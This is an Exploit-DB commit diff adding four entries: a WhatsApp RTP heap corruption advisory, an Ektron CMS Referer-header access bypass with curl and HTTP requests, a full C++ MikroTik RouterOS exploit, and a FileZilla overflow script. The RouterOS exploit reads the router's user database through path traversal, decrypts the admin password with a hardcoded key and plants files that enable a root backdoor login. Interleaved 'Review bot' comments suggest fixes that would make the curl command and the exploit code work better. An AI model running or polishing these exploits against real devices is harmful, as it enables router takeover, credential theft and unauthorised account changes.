DB: 2018-10-11

4 changes to exploits/shellcodes

FileZilla 3.33 - Buffer Overflow (PoC)

WhatsApp - RTP Processing Heap Corruption

MicroTik RouterOS < 6.43rc3 - Remote Root

Ektron CMS 9.20 SP2 - Improper Access Restrictions
This commit is contained in:
Offensive Security 2018-10-11 05:01:43 +00:00
parent 6fe17058fb
commit 038ac7b860
5 changed files with 591 additions and 0 deletions


@ -0,0 +1,51 @@
Heap corruption can occur when the WhatsApp mobile application receives a malformed RTP packet.
08-31 15:43:50.721 9428 9713 F libc : Fatal signal 11 (SIGSEGV), code 1, fault addr 0x7104200000 in tid 9713 (Thread-11)
08-31 15:43:50.722 382 382 W : debuggerd: handling request: pid=9428 uid=10119 gid=10119 tid=9713
08-31 15:43:50.818 9720 9720 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
08-31 15:43:50.818 9720 9720 F DEBUG : Build fingerprint: 'google/angler/angler:7.1.2/N2G48H/natash11071827:userdebug/dev-keys'
08-31 15:43:50.818 9720 9720 F DEBUG : Revision: '0'
08-31 15:43:50.818 9720 9720 F DEBUG : ABI: 'arm64'
08-31 15:43:50.818 9720 9720 F DEBUG : pid: 9428, tid: 9713, name: Thread-11 >>> com.whatsapp <<<
08-31 15:43:50.818 9720 9720 F DEBUG : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7104200000
08-31 15:43:50.819 9720 9720 F DEBUG : x0 00000071041ffde8 x1 00000071047796b0 x2 0000000000000000 x3 0000000000000030
08-31 15:43:50.819 9720 9720 F DEBUG : x4 0000000000000000 x5 0000000000000040 x6 00000071041fffd8 x7 8181818181818181
08-31 15:43:50.819 9720 9720 F DEBUG : x8 8181818181818181 x9 8181818181818181 x10 8181818181818181 x11 8181818181818181
08-31 15:43:50.819 9720 9720 F DEBUG : x12 8181818181818181 x13 8181818181818181 x14 8181818181818181 x15 0000000000000000
08-31 15:43:50.819 9720 9720 F DEBUG : x16 0000007110a468a0 x17 000000712f3b0908 x18 0000000000000000 x19 0000000000000280
08-31 15:43:50.819 9720 9720 F DEBUG : x20 00000071088744a8 x21 0000000000000280 x22 00000071256a5a28 x23 0000007104ff9b70
08-31 15:43:50.819 9720 9720 F DEBUG : x24 000000000000100d x25 000000000000120d x26 0000007104779480 x27 0000007108830828
08-31 15:43:50.819 9720 9720 F DEBUG : x28 0000000000151f80 x29 00000071043fe540 x30 000000711060a010
08-31 15:43:50.819 9720 9720 F DEBUG : sp 00000071043fe320 pc 000000712f3b0a5c pstate 0000000060000000
08-31 15:43:50.825 9720 9720 F DEBUG :
08-31 15:43:50.825 9720 9720 F DEBUG : backtrace:
08-31 15:43:50.825 9720 9720 F DEBUG : #00 pc 000000000001aa5c /system/lib64/libc.so (memcpy+340)
08-31 15:43:50.825 9720 9720 F DEBUG : #01 pc 00000000000c500c /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #02 pc 00000000000c7d60 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #03 pc 00000000000f88d4 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #04 pc 00000000000f6948 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #05 pc 00000000000f0ef4 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #06 pc 00000000000f0630 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #07 pc 00000000000eef3c /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #08 pc 00000000001272e0 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #09 pc 0000000000303d20 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #10 pc 0000000000068734 /system/lib64/libc.so (_ZL15__pthread_startPv+208)
08-31 15:43:50.825 9720 9720 F DEBUG : #11 pc 000000000001da7c /system/lib64/libc.so (__start_thread+16)
This issue can occur when a WhatsApp user accepts a call from a malicious peer. It affects both the Android and iPhone clients.
To reproduce the issue:
1) Apply the attached patch to libwhatsapp.so in the Android application using bsdiff. this patch intercepts a memcpy right before srtp_protect is called, and alters the RTP buffer. The SHA1 of the original library I used was cfdb0266cbd6877e5d146ddd59fa83ebccdd013d, and the SHA1 of the modified library is 042256f240367eaa4a096527d1afbeb56ab2eeb4.
2) Build the attached file, natalie2.c for the Android device the application is running on, and copy it to /data/data/com.whatsapp/libn.so.
3) Copy the files in the attached folder into /data/data/com.whatsapp/files so that /data/data/com.whatsapp/files/t0 is a valid location.
4) Restart WhatsApp and call the target device and pick up the call. The deivce will crash in a few seconds.
Logs from the crashes on Android and iPhone are attached. Note that I modified the Android target binary to disable WhatsApp's custom crash handling. The iPhone WhatsApp install was unmodified.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45579.zip
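Review bot: the advisory names no affected or fixed build for either client, so a defender reading "It affects both the Android and iPhone clients" cannot tell whether a current install is still exposed; the closing paragraph should give the builds the crash was reproduced on and the build in which the RTP handling was corrected, if known. The reproduction steps refer to an "attached patch", "natalie2.c" and an "attached folder" that are not part of this file; the only pointer to them is the zip URL on the last line, so the steps should name that archive before step 1. Minor: "deivce" in step 4 should be "device", and the logcat excerpt would read better with a blank line separating it from the sentence above and from "This issue can occur".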


@ -0,0 +1,112 @@
Details
================
Software: Ektron Content Management System (CMS)
Version: 9.20 SP2
Homepage: https://www.episerver.com
Advisory report: https://github.com/alt3kx/CVE-2018-12596
CVE: CVE-2018-12596
CVSS: 7.5 (HIGH: (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CWE-284
Description
================
Ektron CMS 9.20 SP2 allows remote attackers to enable users.
Vulnerability
================
Ektron CMS 9.20 SP2 allows remote attackers to call aspx pages via the "activateuser.aspx" page, even if a page
is located under the /WorkArea/ path, which is forbidden (normally available exclusively for local admins).
Proof of concept Exploit
========================
Pre-requisites:
- curl command deployed (Windows or Linux)
- Burpsuite Free/Pro deployed or any other WebProxy to catch/send GET request
Step (1): Launch the BurpSuite with default paramenter then request the follwing URL:
Target: https://ektronserver.com/WorkArea/activateuser.aspx
Normally you will see a 403 Forbidden: Access denied.
Step (2): Into BurpSuite Free/Pro add the following extra Header Referer:
"Referer: ALEX;"
Step (3): The offending GET request is:
GET /WorkArea/activateuser.aspx HTTP/1.1
Host: ektronserver.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Referer: ALEX;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Step (4): Test your GET request using curl command and burpsuite as following:
# curl -i -s -k -XGET "https://ektronserver.com/WorkArea/activateuser.aspx"
-H "Host: ektronserver.com"
-H "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0"
-H "Referer: ALEX;"
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
-H "Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate"
-H "Connection: close"
--proxy http://127.0.0.1:8080
You should see now the following response 200 OK!:
HTTP/1.0 200 Connection established
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Now you got access to enable users, just send the repeat request into the browser using burpsuite
Have fun!
Mitigations
================
Install the latest patches available here:
PATCH ID: EKTR-508: Security enhancement for re-enabling a user
https://support.episerver.com/hc/en-us/articles/115002828112-9-2-SP2-Site-Update
Any of the below should fix CVE-2018-12596
9.3(main release)
9.2 SP2 Site CU 22
9.1 SP3 Site CU 45
9.0 SP3 Site CU 31
Disclosure policy
================
We believes in responsible disclosure.
Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.
This vulnerability will be published if we do not receive a response to this report with 10 days.
Timeline
================
20180608: Discovered
20180611: Retest staging environment
20180612: Restes live environment
20180619: Internal communication
20180621: Vendor notification
20180621: Vendor feedback
20180629: Vendor feedback product will be patched
20180629: Patch available
20180629: Agrements with the vendor to publish the CVE/Advisory.
20180730: Internal communication
20180915: Patches tested on LAB environment.
20181008: Public report
Discovered by:
Alex Hernandez aka alt3kx:
================
Please visit https://github.com/alt3kx for more information.
My current exploit list @exploit-db: https://www.exploit-db.com/author/?a=1074
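Review bot: the curl command in step (4) does not run as written: the continuation lines carry no trailing backslashes, and the argument `-H "Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate"` mixes double and single quotes, so the shell passes one header value containing a literal ' -H $' instead of two headers; split it into `-H "Accept-Language: en-US,en;q=0.5" \` and `-H "Accept-Encoding: gzip, deflate" \`. The Vulnerability section should also state plainly what the steps show, that the 403 on /WorkArea/activateuser.aspx is lifted simply by supplying an arbitrary Referer header, since that is the fact an administrator needs to verify the EKTR-508 patch and to alert on requests for /WorkArea/ whose Referer is not the site's own origin. Smaller points: the CVSS line has an unmatched opening parenthesis, "paramenter" and "follwing" in step (1), "We believes" and "with 10 days" in the disclosure policy, and "Restes" and "Agrements" in the timeline.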


@ -0,0 +1,385 @@
/*
# Exploit Title: RouterOS Remote Rooting
# Date: 10/07/2018
# Exploit Author: Jacob Baines
# Vendor Homepage: www.mikrotik.com
# Software Link: https://mikrotik.com/download
# Version: Longterm: 6.30.1 - 6.40.7 Stable: 6.29 - 6.42 Beta: 6.29rc1 - 6.43rc3
# Tested on: RouterOS Various
# CVE : CVE-2018-14847
By the Way is an exploit coded in C++ that enables a root shell on Mikrotik devices running RouterOS versions:
Longterm: 6.30.1 - 6.40.7
Stable: 6.29 - 6.42
Beta: 6.29rc1 - 6.43rc3
The exploit can be found here: https://github.com/tenable/routeros/tree/master/poc/bytheway
The exploit leverages the path traversal vulnerability CVE-2018-14847 to extract the admin password and create an "option" package to enable the developer backdoor. Post exploitation the attacker can connect to Telnet or SSH using the root user "devel" with the admin's password.
Mikrotik patched CVE-2018-14847 back in April. However, until this PoC was written, I don't believe its been publicly disclosed that the attack can be levegered to write files. You can find Mikrotik's advisory here:
https://blog.mikrotik.com/security/winbox-vulnerability.html
Note that, while this exploit is written for Winbox, it could be ported to HTTP as long as you had prior knowledge of the admin credentials.
# Usage Example
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password:
Login failed, incorrect username or password
Connection closed by foreign host.
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251
[+] Extracting passwords from 192.168.1.251:8291
[+] Searching for administrator credentials
[+] Using credentials - admin:lol
[+] Creating /pckg/option on 192.168.1.251:8291
[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291
[+] There's a light on
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password:
BusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
# uname -a
Linux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown
# cat /rw/logs/VERSION
v6.38.4 Mar/08/2017 09:26:17
# Connection closed by foreign host.
*/
#include <sstream>
#include <cstdlib>
#include <iostream>
#include <boost/cstdint.hpp>
#include <boost/program_options.hpp>
#include "winbox_session.hpp"
#include "winbox_message.hpp"
#include "md5.hpp"
namespace
{
const char s_version[] = "By the Way 1.0.0";
/*!
* Parses the command line arguments. The program will always use two
* parameters (ip and winbox port) but the port will default to 8291 if
* not present on the CLI
*
* \param[in] p_arg_count the number of arguments on the command line
* \param[in] p_arg_array the arguments passed on the command line
* \param[in,out] p_ip the ip address to connect to
* \param[in,out] p_winbox_port the winbox port to connect to
* \return true if we have valid ip and ports. false otherwise.
*/
bool parseCommandLine(int p_arg_count, const char* p_arg_array[],
std::string& p_ip, std::string& p_winbox_port)
{
boost::program_options::options_description description("options");
description.add_options()
("help,h", "A list of command line options")
("version,v", "Display version information")
("winbox-port,w", boost::program_options::value<std::string>()->default_value("8291"), "The winbox port")
("ip,i", boost::program_options::value<std::string>(), "The ip to connect to");
boost::program_options::variables_map argv_map;
try
{
boost::program_options::store(
boost::program_options::parse_command_line(
p_arg_count, p_arg_array, description), argv_map);
}
catch (const std::exception& e)
{
std::cerr << e.what() << "\n" << std::endl;
std::cerr << description << std::endl;
return false;
}
boost::program_options::notify(argv_map);
if (argv_map.empty() || argv_map.count("help"))
{
std::cerr << description << std::endl;
return false;
}
if (argv_map.count("version"))
{
std::cerr << "Version: " << ::s_version << std::endl;
return false;
}
if (argv_map.count("ip") && argv_map.count("winbox-port"))
{
p_ip.assign(argv_map["ip"].as<std::string>());
p_winbox_port.assign(argv_map["winbox-port"].as<std::string>());
return true;
}
else
{
std::cerr << description << std::endl;
}
return false;
}
/*!
* This function uses the file disclosure vulnerability, CVE-2018-14847, to
* download the user database from /flash/rw/store/user.dat
*
* \param[in] p_ip the address of the router to connect to
* \param[in] p_winbox_port the winbox port to connect to
* \return a string containing the user.dat data or an empty string on error
*/
std::string getPasswords(const std::string& p_ip, const std::string& p_winbox_port)
{
std::cout << "[+] Extracting passwords from " << p_ip << ":" << p_winbox_port << std::endl;
Winbox_Session winboxSession(p_ip, p_winbox_port);
if (!winboxSession.connect())
{
std::cerr << "[!] Failed to connect to the remote host" << std::endl;
return std::string();
}
WinboxMessage msg;
msg.set_to(2, 2);
msg.set_command(7);
msg.set_request_id(1);
msg.set_reply_expected(true);
msg.add_string(1, "//./.././.././../flash/rw/store/user.dat");
winboxSession.send(msg);
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "[!] Error receiving an open file response." << std::endl;
return std::string();
}
boost::uint32_t sessionID = msg.get_session_id();
boost::uint16_t file_size = msg.get_u32(2);
if (file_size == 0)
{
std::cerr << "[!] File size is 0" << std::endl;
return std::string();
}
msg.reset();
msg.set_to(2, 2);
msg.set_command(4);
msg.set_request_id(2);
msg.set_reply_expected(true);
msg.set_session_id(sessionID);
msg.add_u32(2, file_size);
winboxSession.send(msg);
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "[!] Error receiving a file content response." << std::endl;
return std::string();
}
return msg.get_raw(0x03);
}
/*!
* Looks through the user.dat file for an enabled administrative account that
* we can use. Once a useful account is found the password is decrypted.
*
* \param[in] p_user_dat the user.dat file data
* \param[in,out] p_username stores the found admin username
* \param[in,out] p_password stores the found admin password
* \return true on success and false otherwrise
*/
bool get_password(const std::string p_user_dat, std::string& p_username, std::string& p_password)
{
std::cout << "[+] Searching for administrator credentials " << std::endl;
// the dat file is a series of nv::messages preceded by a two byte length
std::string dat(p_user_dat);
while (dat.size() > 4)
{
boost::uint16_t length = *reinterpret_cast<const boost::uint16_t*>(&dat[0]);
if (dat[2] != 'M' || dat[3] != '2')
{
// this is mild insanity but the .dat file messages don't line
// up properly if a new user is added or whatever.
dat.erase(0, 1);
continue;
}
dat.erase(0, 4);
length -= 4;
if (length > dat.size())
{
return false;
}
std::string entry(dat.data(), length);
dat.erase(0, length);
WinboxMessage msg;
msg.parse_binary(entry);
// we need an active admin account
// 0x2 has three groups: 1 (read), 2 (write), 3 (full)
if (msg.get_u32(2) == 3 && msg.get_boolean(0xfe000a) == false)
{
p_username.assign(msg.get_string(1));
std::string encrypted_pass(msg.get_string(0x11));
if (!encrypted_pass.empty() && msg.get_u32(0x1f) != 0)
{
std::string hash_this(p_username);
hash_this.append("283i4jfkai3389");
MD5 md5;
md5.update(hash_this.c_str(), hash_this.size());
md5.finalize();
std::string md5_hash(md5.getDigest());
for (std::size_t i = 0; i < encrypted_pass.size(); i++)
{
boost::uint8_t decrypted = encrypted_pass[i] ^ md5_hash[i % md5_hash.size()];
if (decrypted == 0)
{
// a null terminator! We did it.
return true;
}
p_password.push_back(decrypted);
}
p_password.clear();
}
}
}
return false;
}
}
/*!
* This function creates the file /pckg/option on the target. This will enable
* the developer login on Telnet and SSH. Oddly, you'll first need to log in
* to Telnet for SSH to work, but I digress...
*
* \param[in] p_ip the ip address of the router
* \param[in] p_port the port of the jsproxy we'll connect to
* \param[in] p_username the username we'll authenticate with
* \param[in] p_password the password we'll authenticate with
* \return true if we successfully created the file.
*/
bool create_file(const std::string& p_ip, const std::string& p_port,
const std::string& p_username, const std::string& p_password)
{
Winbox_Session mproxy_session(p_ip, p_port);
if (!mproxy_session.connect())
{
std::cerr << "[-] Failed to connect to the remote host" << std::endl;
return false;
}
boost::uint32_t p_session_id = 0;
if (!mproxy_session.login(p_username, p_password, p_session_id))
{
std::cerr << "[-] Login failed." << std::endl;
return false;
}
std::cout << "[+] Creating /pckg/option on " << p_ip << ":" << p_port << std::endl;
WinboxMessage msg;
msg.set_to(2, 2);
msg.set_command(1);
msg.set_request_id(1);
msg.set_reply_expected(true);
msg.set_session_id(p_session_id);
msg.add_string(1, "//./.././.././../pckg/option");
mproxy_session.send(msg);
msg.reset();
mproxy_session.receive(msg);
if (msg.has_error())
{
std::cout << "[-] " << msg.get_error_string() << std::endl;
return false;
}
std::cout << "[+] Creating /flash/nova/etc/devel-login on " << p_ip << ":" << p_port << std::endl;
msg.reset();
msg.set_to(2, 2);
msg.set_command(1);
msg.set_request_id(2);
msg.set_reply_expected(true);
msg.set_session_id(p_session_id);
msg.add_string(1, "//./.././.././../flash/nova/etc/devel-login");
mproxy_session.send(msg);
msg.reset();
mproxy_session.receive(msg);
if (msg.has_error())
{
std::cout << "[-] " << msg.get_error_string() << std::endl;
return false;
}
return true;
}
int main(int p_argc, const char** p_argv)
{
std::string ip;
std::string winbox_port;
if (!parseCommandLine(p_argc, p_argv, ip, winbox_port))
{
return EXIT_FAILURE;
}
std::cout << std::endl;
std::cout << " ╔╗ ┬ ┬ ┌┬┐┬ ┬┌─┐ ╦ ╦┌─┐┬ ┬" << std::endl;
std::cout << " ╠╩╗└┬┘ │ ├─┤├┤ ║║║├─┤└┬┘" << std::endl;
std::cout << " ╚═╝ ┴ ┴ ┴ ┴└─┘ ╚╩╝┴ ┴ ┴ " << std::endl;
std::cout << std::endl;
// step one - do the file disclosure
std::string user_dat(getPasswords(ip, winbox_port));
if (user_dat.empty())
{
return EXIT_FAILURE;
}
// step two - parse the password
std::string admin_username;
std::string admin_password;
if (!get_password(user_dat, admin_username, admin_password))
{
std::cout << "[-] Failed to find admin creds. Trying default." << std::endl;
admin_username.assign("admin");
admin_password.assign("");
}
std::cout << "[+] Using credentials - " << admin_username << ":" << admin_password << std::endl;
// step three - create the file
if (!create_file(ip, winbox_port, admin_username, admin_password))
{
return EXIT_FAILURE;
}
std::cout << "[+] There's a light on" << std::endl;
return EXIT_SUCCESS;
}
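Review bot: in getPasswords the response size is stored as `boost::uint16_t file_size = msg.get_u32(2);`, which silently truncates any user.dat larger than 64 KiB and then asks for only the truncated length in `msg.add_u32(2, file_size);`; declare file_size as boost::uint32_t. The same function never checks msg.has_error() after either receive(), unlike create_file, so an error reply to the open request surfaces as the misleading "File size is 0" instead of the server's error string. Two documentation points: the file includes winbox_session.hpp, winbox_message.hpp and md5.hpp, which are not part of this commit, so the header comment should say they come from the tenable/routeros repository linked above and how the binary is built (the usage example runs ./btw from a build/ directory but names no build system). The closing brace on the line before the create_file comment ends the anonymous namespace, leaving create_file with external linkage while its helpers are internal, which looks unintended. Minor: get_password takes p_user_dat by value and then copies it again into dat, and "otherwrise" in its comment should be "otherwise".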

exploits/linux/dos/45576.py Executable file

@ -0,0 +1,39 @@
# Exploit Title: FileZilla 3.33 Buffer-Overflow (PoC)
# Author: Kağan Çapar
# Discovery Date: 2018-10-10
# Software Link: https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/filezilla/3.33.0-1/filezilla_3.33.0-1.debian.tar.xz
# Vendor Homepage : https://filezilla-project.org
# Tested Version: 3.33
# Tested on OS: Kali Linux 2018.3 x64
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt". Copy the content from "exploit.txt".
# Open new terminal and write "filezilla"
# Go to Bookmarks and Add bookmark or Ctrl + B
# Now paste the contents of "exploit.txt" into the fields. "Name:"
# Click "OK" after Click "Bookmarks" you will see a crash on terminal.
#!/usr/bin/python
buffer = "\x50\x48\x52" * 1300
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
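Review bot: the `#!/usr/bin/python` shebang sits below the header comments, so it is just another comment; the interpreter line must be the first line of the file if the script is meant to be run directly, which the "Executable file" flag on this entry implies. The bare `except:` discards the reason the file could not be created; catch `IOError as e` and print it so the user can tell a permissions problem from a missing directory. The script is Python 2 only (print statements), which the header should state or the two prints should become print() calls. The steps to reproduce are also hard to follow at "into the fields. "Name:"" and "Click "OK" after Click "Bookmarks"": say that the 3900-character string from exploit.txt goes into the "Name:" field, then OK is clicked, then the Bookmarks menu is opened, so the reader knows the crash is triggered by the bookmark name and not by a file FileZilla parses.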


@ -6142,8 +6142,10 @@ id,file,description,date,author,type,platform,port
45547,exploits/linux/dos/45547.txt,"net-snmp 5.7.3 - Authenticated Denial of Service (PoC)",2018-10-08,"Magnus Klaaborg Stubman",dos,linux,
45557,exploits/linux/dos/45557.c,"Linux - Kernel Pointer Leak via BPF",2018-10-08,"Google Security Research",dos,linux,
45558,exploits/android/dos/45558.txt,"Android - sdcardfs Changes current->fs Without Proper Locking",2018-10-08,"Google Security Research",dos,android,
45576,exploits/linux/dos/45576.py,"FileZilla 3.33 - Buffer Overflow (PoC)",2018-10-10,"Kağan Çapar",dos,linux,
45571,exploits/windows/dos/45571.js,"Microsoft Edge Chakra JIT - 'BailOutOnInvalidatedArrayHeadSegment' Check Bypass",2018-10-09,"Google Security Research",dos,windows,
45572,exploits/windows/dos/45572.js,"Microsoft Edge Chakra JIT - Type Confusion",2018-10-09,"Google Security Research",dos,windows,
45579,exploits/android/dos/45579.txt,"WhatsApp - RTP Processing Heap Corruption",2018-10-10,"Google Security Research",dos,android,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
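Review bot: the new row for 45576 is inserted between 45558 and 45571, breaking the ascending id order the surrounding rows follow; the same holds for 45578 (placed between 43985 and 43993) and 45577 (between 45155 and 45158) in the next two hunks. The four new rows also carry the date 2018-10-10 while the commit title says "DB: 2018-10-11"; confirm which is the intended publication date.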
@ -16532,6 +16534,7 @@ id,file,description,date,author,type,platform,port
43983,exploits/hardware/remote/43983.py,"Geovision Inc. IP Camera & Video - Remote Command Execution",2018-02-01,bashis,remote,hardware,
43984,exploits/multiple/remote/43984.txt,"Axis SSI - Remote Command Execution / Read Files",2017-10-20,bashis,remote,multiple,
43985,exploits/multiple/remote/43985.txt,"Axis Communications MPQT/PACS - Heap Overflow / Information Leakage",2017-11-30,bashis,remote,multiple,
45578,exploits/hardware/remote/45578.cpp,"MicroTik RouterOS < 6.43rc3 - Remote Root",2018-10-10,"Jacob Baines",remote,hardware,
43993,exploits/windows/remote/43993.py,"Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution",2018-02-07,"Faisal Tameesh",remote,windows,
43997,exploits/hardware/remote/43997.py,"Herospeed - 'TelnetSwitch' Remote Stack Overflow / Overwrite Password / Enable TelnetD",2018-01-22,bashis,remote,hardware,787
43999,exploits/multiple/remote/43999.txt,"Uniview - Remote Command Execution / Export Config (PoC)",2017-10-28,bashis,remote,multiple,
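Review bot: the description spells the vendor "MicroTik", but the exploit file itself gives www.mikrotik.com as the vendor homepage and the router banner prints "MikroTik"; use "MikroTik RouterOS < 6.43rc3" so searches for the vendor name find this entry, and align the commit title with it.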
@ -39951,6 +39954,7 @@ id,file,description,date,author,type,platform,port
45153,exploits/java/webapps/45153.txt,"LAMS < 3.1 - Cross-Site Scripting",2018-08-06,"Nikola Kojic",webapps,java,8080
45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,443
45155,exploits/php/webapps/45155.txt,"CMS ISWEB 3.5.3 - Directory Traversal",2018-08-06,"Thiago Sena",webapps,php,
45577,exploits/aspx/webapps/45577.txt,"Ektron CMS 9.20 SP2 - Improper Access Restrictions",2018-10-10,alt3kx,webapps,aspx,
45158,exploits/java/webapps/45158.txt,"Wavemaker Studio 6.6 - Server-Side Request Forgery",2018-08-06,"Gionathan Reale",webapps,java,
45266,exploits/windows/webapps/45266.txt,"Sentrifugo HRMS 3.2 - 'deptid' SQL Injection",2018-08-27,"Javier Olmedo",webapps,windows,
45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php,
